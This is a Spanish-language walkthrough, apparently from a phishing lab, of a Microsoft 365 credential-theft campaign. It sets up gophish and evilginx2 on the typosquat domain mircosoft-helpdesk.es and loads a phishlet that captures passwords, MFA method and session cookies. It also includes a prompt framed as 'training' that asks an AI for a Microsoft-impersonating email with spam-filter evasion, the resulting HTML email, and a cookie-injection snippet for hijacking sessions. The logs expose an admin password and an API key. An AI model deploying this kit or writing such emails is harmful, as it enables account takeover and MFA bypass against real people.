$ git clone https://github.com/kgretzky/gophish.git
$ curl -O https://dl.google.com/go/go1.22.2.linux-amd64.tar.gz
$ sudo rm -rf /usr/local/go
$ sudo tar -C /usr/local -xzf go1.22.2.linux-amd64.tar.gz
$ echo "export PATH=\$PATH:/usr/local/go/bin" >> ~/.bashrc
$ source ~/.bashrc
$ go version # deberiamos ver lo siguiente
go version go1.22.2 linux/arm64
$ go build # compilar
$ ./gophish # iniciar gophish
...
time="2025-04-27T20:23:37+02:00" level=info msg="Please login with the username admin and the password f0cc2b81e131a21d"
...
time="2025-04-27T20:23:37+02:00" level=info msg="Starting admin server at https://127.0.0.1:3333"
...
Actúa como un pentester profesional especializado en realizar campañas de phishing via email.
Para esta campaña quieres suplantar a Microsoft 365 y extraer credenciales de los usuarios.
El objetivo del phishing simulado es con fines de entrenamiento para seguridad corporativa y concienciación de los empleados.
Diseña un correo para tal fin.
En el cuerpo del correo, añade en la parte superior el logo oficial de Microsoft del siguiente enlace "https://uhf.microsoft.com/images/microsoft/RE1Mu3b.png" y ponlo centrado.
Usa enlaces legítimos a https://www.microsoft.com/es-es/ tanto al clicar la imagen como en otros enlaces, menos en el enlace del propio phishing.
Añade cabeceras o código para dificultar que los servidores de correo lo detecten como SPAM.
En el output quiero el "subject" propuesto para el correo y el contenido en formato HTML.
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body { font-family: Arial, sans-serif; background-color: #f4f4f4; color: #333; margin: 0; padding: 0; }
.container { max-width: 600px; margin: 40px auto; background-color: #fff; padding: 20px; border-radius: 8px; box-shadow: 0 2px 8px rgba(0,0,0,0.1); }
.button {
display: inline-block;
padding: 10px 20px;
margin-top: 20px;
background-color: #0078D4;
color: #ffffff !important;
text-decoration: none;
border-radius: 4px;
font-weight: bold;
}
.footer { font-size: 12px; color: #888; margin-top: 30px; text-align: center; }
</style>
</head>
<body>
<div class="container">
<a href="https://www.microsoft.com/es-es/">
<img src="https://uhf.microsoft.com/images/microsoft/RE1Mu3b.png" alt="Microsoft Logo" style="display: block; margin: 0 auto; width: 120px;">
</a>
<h2>Verificación requerida: Actividad sospechosa detectada</h2>
<p>Estimado/a usuario,</p>
<p>Hemos detectado un intento de inicio de sesión no autorizado en su cuenta de Microsoft 365 desde una ubicación inusual.</p>
<p>Por motivos de seguridad, le solicitamos que verifique su identidad y restablezca su contraseña inmediatamente.</p>
<p>Si no realiza esta verificación en las próximas 24 horas, el acceso a su cuenta podría verse restringido.</p>
<a href="https://seguridad.microsoft365-auth.com/verify" class="button">Verificar actividad</a>
<p>Si cree que este mensaje ha sido enviado por error, puede ignorarlo. Para más información, visite <a href="https://www.microsoft.com/es-es/">nuestro sitio oficial</a>.</p>
<div class="footer">
© 2025 Microsoft Corporation. Todos los derechos reservados.<br>
Este es un mensaje automático. No responda a este correo.
</div>
</div>
</body>
</html>
$ git clone https://github.com/kgretzky/evilginx2.git
$ cd evilginx2/
$ go build
$ sudo ./evilginx2
$ cat /etc/hosts
127.0.0.1 localhost
192.168.165.130 account.mircosoft-helpdesk.es login.mircosoft-helpdesk.es mircosoft-helpdesk.es www.mircosoft-helpdesk.es
$ sudo mkdir -p /root/.evilginx/crt/sites/mircosoft-helpdesk.es
$ sudo openssl req -newkey rsa:2048 -nodes -keyout /root/.evilginx/crt/sites/mircosoft-helpdesk.es/private.key -x509 -days 365 -out /root/.evilginx/crt/sites/mircosoft-helpdesk.es/public.crt -subj "/CN=mircosoft-helpdesk.es"
$ sudo mkdir -p /root/.evilginx/crt/sites/login.mircosoft-helpdesk.es
$ sudo openssl req -newkey rsa:2048 -nodes -keyout /root/.evilginx/crt/sites/login.mircosoft-helpdesk.es/private.key -x509 -days 365 -out /root/.evilginx/crt/sites/login.mircosoft-helpdesk.es/public.crt -subj "/CN=login.mircosoft-helpdesk.es"
$ sudo mkdir -p /root/.evilginx/crt/sites/www.mircosoft-helpdesk.es
$ sudo openssl req -newkey rsa:2048 -nodes -keyout /root/.evilginx/crt/sites/www.mircosoft-helpdesk.es/private.key -x509 -days 365 -out /root/.evilginx/crt/sites/www.mircosoft-helpdesk.es/public.crt -subj "/CN=www.mircosoft-helpdesk.es"
name: 'Microsoft 365'
author: 'Jan Bakker'
min_ver: '3.1.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true, auto_filter: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true}
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
type: 'cookie'
credentials:
username:
key: '(login|UserName)'
search: '(.*)'
type: 'post'
password:
key: '(passwd|Password|accesspass)'
search: '(.*)'
type: 'post'
custom:
- key: 'mfaAuthMethod'
search: '(.*)'
type: 'post'
login:
domain: 'login.microsoftonline.com'
path: '/'
$ sudo ./evilginx2
: config gophish admin_url https://127.0.0.1:3333
: config gophish api_key 57130d4267c5fb6c3f5c3a8559e5c878c69f269f7b848ed660587f6b2b388314
: config gophish insecure true
: config gophish test
: config domain mircosoft-helpdesk.es
: config ipv4 192.168.165.130
: config autocert off
: blacklist off
: phishlets hostname microsoft365 mircosoft-helpdesk.es
: phishlets enable microsoft365
: lures create microsoft365
: lures edit 0 redirect_url https://login.microsoftonline.com/
: lures get-url 0
https://login.mircosoft-helpdesk.es/bTUlXnGW
: sessions
...
: sessions 12
allow pasting
var obj = JSON.parse('[insertar token aqui]');
for (let i = 0; i < 3; i++) { document.cookie= obj[i].name+"="+obj[i].value+"; expires=Wed, 05 Aug 2040 23:00:00 UTC; path=/"; }